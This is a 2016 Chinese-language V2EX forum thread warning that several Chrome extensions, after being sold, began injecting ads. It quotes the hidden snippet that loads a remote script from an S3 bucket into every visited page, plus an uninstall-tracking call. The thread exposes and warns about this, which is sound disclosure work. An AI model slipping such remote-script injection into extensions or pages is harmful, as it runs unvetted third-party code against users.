V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
shiji
V2EX  ›  分享发现

关于 Chrome 插件的安全问题

  •  1
     
  •   shiji · 2016-11-01 03:43:17 +08:00 · 5009 次点击
    这是一个创建于 2975 天前的主题,其中的信息可能已经有所发展或是发生改变。

    今天用 Chrome 分析网络的时候发现了个 403 状态的“ http_headers_1.js ”最近总是看见。 问题是我访问的是自己的网站,里面没有加载任何 js ,就是个百分百的纯文字页。

    后来问题查到了 Chrome 扩展上:

    https://chrome.google.com/webstore/detail/http-headers/mhbpoeinkhpajikalhfpjjafpfgjnmgk/reviews

    这个叫 Http Header 是我经常使用的一个插件

    插件里面有这么一句:

    (() => {
    var s = document.createElement('script');
    s.src = '//s3.eu-central-1.amazonaws.com/forton/http_headers_1.js';
    document.body.appendChild(s);})();
    

    目前来说我只见到了 403 状态码。 然后当我卸载了它重新安装的时候。发现这句话不见了:

    (() => {
        if (!chrome.contextMenus) {
        return void console.log("Chrome contextMenus access failed"); // http_headers_1
    }
    

    但是这个注释也蛮有意思。

    针对这个 S3 域名加部分路径搜索,发现了这个:

    https://www.reddit.com/r/chrome/comments/4uawrf/fyi_tab_manager_extensions_new_owners_have_added/

    https://www.reddit.com/r/help/comments/4tquap/hitting_collapse_comment_icon_button_is/

    插入的 js 路径:

    https://s3.eu-central-1.amazonaws.com/forton/tab_manager.js

    只是文件名不一样了。而且这个 js 是可访问的,不会 403 。说简单点功能就是插广告,引流返利之类的东西。

    这些插件作者不同,但是都是近期被别的公司买了。

    我觉得 Chrome 应该可以设置禁止插件自动更新,尤其是插件发生了权限变更的时候,谷歌提示要么更新要么删除,有点变态。

    更多类似感染的插件:

    Live HTTP Headers:

    https://chrome.google.com/webstore/detail/live-http-headers/iaiioopjkcekapmldfgbebdclcnpgnlo/reviews?hl=en-US

    HTTP Headers:

    https://chrome.google.com/webstore/detail/http-headers/mhbpoeinkhpajikalhfpjjafpfgjnmgk/reviews

    Tab Manage:

    https://chrome.google.com/webstore/detail/tab-manager/coonecdghnepgiblpccbbihiahajndda/reviews?hl=en&gl=US

    以上几个估计背后的人是一伙的。

    还有这个,我很早就发现问题了,安装的时候会偷偷下载另外一个扩展安装上:

    Change HTTP Request Header

    https://chrome.google.com/webstore/detail/change-http-request-heade/ppmibgfeefcglejjlpeihfdimbkfbbnm/reviews?hl=en-US

    8 条回复    2016-11-15 21:34:54 +08:00
    onionnews
        1
    onionnews  
       2016-11-01 08:22:15 +08:00 via Android
    现在就用一些必要的扩展,其余都删了
    redsonic
        2
    redsonic  
       2016-11-01 08:34:47 +08:00
    google 是不是不允许插件代码混淆,如果是我就混淆一下,既然已经耍流氓了。
    honeycomb
        3
    honeycomb  
       2016-11-01 08:37:03 +08:00 via Android
    Google 自己写了一个扩展可以用来监控所有扩展的动作
    shiji
        4
    shiji  
    OP
       2016-11-01 09:25:31 +08:00
    @honeycomb 我刚刚找了找,没找到。求名字
    idler
        5
    idler  
       2016-11-01 09:35:44 +08:00   ❤️ 3
    AlphaTr
        6
    AlphaTr  
       2016-11-01 10:01:19 +08:00
    除了大厂的差价,剩下的插件自己写
    danliuwo
        7
    danliuwo  
       2016-11-01 21:08:32 +08:00
    词霸快译 表示不服,在没有安装任何它的插件它也能搞 chrome, 我在收藏夹打开链接它会先弹出一个新窗口广告,你说屌不屌,别以为不安装插件就安全了
    ctsed
        8
    ctsed  
       2016-11-15 21:34:54 +08:00
    还有这个

    Inject jQuery 1.0.4
    Injects jQuery in the page.
    ID : indebdooekgjhkncmgbkeopjebofdoid

    chrome.runtime.setUninstallURL('http://extsgo.com/api/tracker/uninstall?ext_id=' + chrome.runtime.id);
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1001 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 21:33 · PVG 05:33 · LAX 13:33 · JFK 16:33
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.